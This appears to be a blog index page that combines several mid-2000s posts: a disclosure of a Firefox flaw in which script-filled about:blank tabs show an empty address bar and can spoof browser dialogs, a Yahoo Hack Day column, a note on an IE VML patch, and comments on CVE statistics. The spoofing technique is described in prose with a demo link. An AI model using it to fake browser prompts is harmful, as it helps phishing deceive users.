Firefox suffers from a design flaw that can be used to confuse casual users and evoke a false sense of authority when visiting a fraudulent website. The flaw can be also used to bypass a fix for an old UI spoofing bug that was thought to be addressed. This is a relatively minor issue, but I thought it’s worth reporting. It is possible for a script to open ‘about:blank’ URL in a new tab; this tab will be opened with a blank address bar (the behavior is different for new windows, where the bar will be grayed out or hidden).
The script can then interact with this document as if it were a page in the same domain, including the ability to inject of custom HTML. Some methods of adding this HTML, such as win.document.write(), will update document.location and the address bar to that of the interacting script, which seems like an intuitive choice - the user is informed about the origin of the displayed data.
Since about:blank is a minimal but valid HTML document with a DOM structure, it is also possible to inject code through the use of win.document.body.appendChild() and friends, in which case, the URL bar remains blank, the ‘reload’ button is disabled, and ‘page info’ / ‘page source’ menu options will show no useful data.
Having text displayed in a window that has an empty URL bar can confuse the user as to the origin of the displayed data or security prompts, as if they were internal browser messages; an empty address bar is considerably less suspicious than a shady host name or a panic-inducing data: URL scheme.
Furthermore, there was an old UI spoofing bug - when a window was opened without URL bar and menus, the attacker could use strategically placed graphics and HTML controls (or XUL code), so that the fake URL bar read “google.com”, while an IFRAME below could display “zombo.com” instead. Similarly, he could spoof a native browser-originating modal warning or dialog to have the user do something dumb. This problem was addressed by forcibly prepending current site name to window title for all URL-bar-less windows, so that the Internet origin of such a pop-up is clear, and so that it will have a hard time mimicking a native window.
The problem is that ‘about:blank’ windows that have no document.location defined can be used to inhibit this behavior - window title can be freely controlled, except for the appended ‘ - Mozilla Firefox’ string, and spoof browser UI elements without the user having a reason to be suspicious.
A quick if naive demonstration of the two attacks described here can be found at this URL:
http://lcamtuf.coredump.cx/ffblank/
Just when it was in danger of becoming entirely respectable, the word “hacker” was reclaimed over the weekend on behalf of all of the old-fashioned hackers of the world. It happened at the Yahoo Hack Day, and we have a Yahoo rival, indirectly, to thank.
For several years, Yahoo has been holding Hack Days for its engineers. The idea is to give engineers a day off to come up with an idea, develop a quick and dirty working version of it, and then show it to colleagues. The point, says Yahoo, isn’t so much to get finished products but to encourage outside-the-box collaboration.
This past weekend, Yahoo held the first Hack Day open to the public, and hundreds of programmers made their way to the company’s Sunnyvale, Calif., headquarters to take part.
For its troubles, Yahoo gets to look at some smart programmers it might want to hire. It also gets to tell a recruiting-department-brochure version of life at Yahoo — one full of beer, barbecue and Beck (the musician gave a free concert Friday night), and a place where the only limits to what programmers can work on are their imaginations and their tolerance for Red Bull. All this is opposed to, say, having to slog away in the salt mines of search monetization, which might well be what they would end up doing if they ever really got hired.
Hacker, of course, used to mean “computer-connected bad guy.” That’s still how the word is used on TV. In tech circles, however, it has shed its nefarious undertones and now stands for “computer enthusiast.” (Although, in more rarified programming circles, it has come full circle and is pejorative once more; here a hacker has only a superficial knowledge of programming and gravitates toward quick but impermanent solutions. Think duct tape.)
The pro-hacker aesthetic is now so ascendant that the mere whim of hacker is valued more than even the most studied plan of someone else, such as a marketing dweeb. Indeed, the organizers of Yahoo Hack Day said participants weren’t even supposed to decide before they arrived what their hack project was going to be.
That clearly didn’t happen. A number of Hack Day participants used the opportunity to strut their existing Web sites (”flipmeat,” in the lexicon of the current Web 2.0 business bubble) in front of potential Yahoo acquirers.
Saturday afternoon, after 24 hours of hacking, about 50 projects were presented in two-minute segments to a panel of judges. The majority were mix-and-match combinations of Yahoo offerings: programs to show users when their favorite bands would be playing in town, to allow people looking at a Web site together to blog about it, and to let people uploading photos to attach audio files to them.
Then, in the middle of things, a programmer named Jordan Sissel stepped on stage. For his hack, Mr. Sissel said, he figured out how to store large files — pictures, MP3s, even whole computer programs — on Yahoo’s Del.icio.us Web site.
Del.icio.us is a hot site among the technorati that hasn’t really caught on in the rest of the world. It lets users bookmark Web pages, then see what pages other people have linked to. What was remarkable about Mr. Sissel’s announcement was that it wasn’t a place to store files.
At least not before he got his hands on it. In his allotted two minutes, the 23-year old showed how he managed to fool the Del.icio.us system into storing a multimegabyte photograph of the San Francisco skyline.
Up until now, everything that hackers had been showing was entirely polite. But Mr. Sissel’s hack was not polite. In fact, it was very naughty — not criminal or unethical, just naughty — in that cool, old-fashioned hacker way. For one thing, it could place an enormous load on the Del.icio.us computers.
But, like any great hack, the program was clever and funny. His hacker forefathers — a lineage that includes Steve Jobs and Steve Wozniak, who before selling the Apple I computer sold “blue boxes” that allowed you to make free phone calls — would have been proud.
The audience roared its approval, and several came up to congratulate him. “Dude, that was a great hack,” one said.
Mr. Sissel’s project didn’t win the “best hack” award. That honor went to something more polite: a small digital camera that would automatically upload photos to Yahoo’s Flickr site.
Later, Mr. Sissel told me he planned his hack Friday morning. Usually, he explained, the URLs that Del.icio.us users send to the site are just a dozen or so characters long. But they can be as long as 65,535 characters. Mr. Sissel thus split up his big file, sent each chunk to Del.icio.us as a URL, then hacked a way to recombine them.
That’s not quite how founders of the site planned on it being used. But doing something someone didn’t plan on is pretty much what hackers are all about.
For the conspiracy buffs among you, Mr. Sissel’s employer is Google. Mr. Sissel says he has worked there four months, in technical support. He insisted he wasn’t acting as some Google agent trying to embarrass Yahoo on its big day.
I couldn’t help but believe him; he had too much geeky insouciance to be lying. No, this guy wasn’t any sort of spy or saboteur. He was a hacker!
Get this fix right away: Microsoft released an unusual out-of-cycle patch yesterday for the latest zero-day hole in Internet Explorer 6 that can hit fully patched systems (up until yesterday) with a drive-by-download.
The threat involves images in a little-used Microsoft format called VML, for vector markup language. Microsoft had originally said it would release a patch on its next scheduled update day, Oct. 10. But my colleague Robert McMillan at the IDG news service reported that there are already thousands of Web sites exploiting this VML graphics bug. So to their credit, Microsoft moved more quickly than they originally stated. The ongoing attacks against the similar similar WMF hole from January likely played a part.
Redmond is distributing the fix via Automatic Updates. I installed the patch on my computers last night as I got the notice (I have updates set to download automatically but wait for my ok to install). You should also be able to run Windows Update manually to get it.
Earlier this month, Mitre revealed that web application vulnerabilities have now claimed the top three spots on the CVE request list. Specifically, the ranking for 2006 is as follows:
The statistics are significant as they provide evidence of the prevalence of web application vulnerabilities. Coverage of this issue has however been somewhat misleading as reports have suggested that it is a measure of what attackers are doing. This assumption is false. CVE requests represent the volume of discovered vulnerabilities in commercial and open source applications, they do not reflect the degree to which those vulnerabilities exist in the real world, nor do they reflect what vulnerabilities attackers are actually using to access vulnerable systems.
Web applications pose a unique threat as programming web applications does not require employing skilled programmers. Anyone with access to various point and click tools is now a web developer. For that reason, I suspect that web application vulnerabilities are even more of a threat in the real world than the Mitre statistics would suggest. CVE numbers tell us that web application vulnerabilities are plaguing software developers but they do not provide insight into vulnerabilities within custom built sites. (more…)
39 queries. 0.435 seconds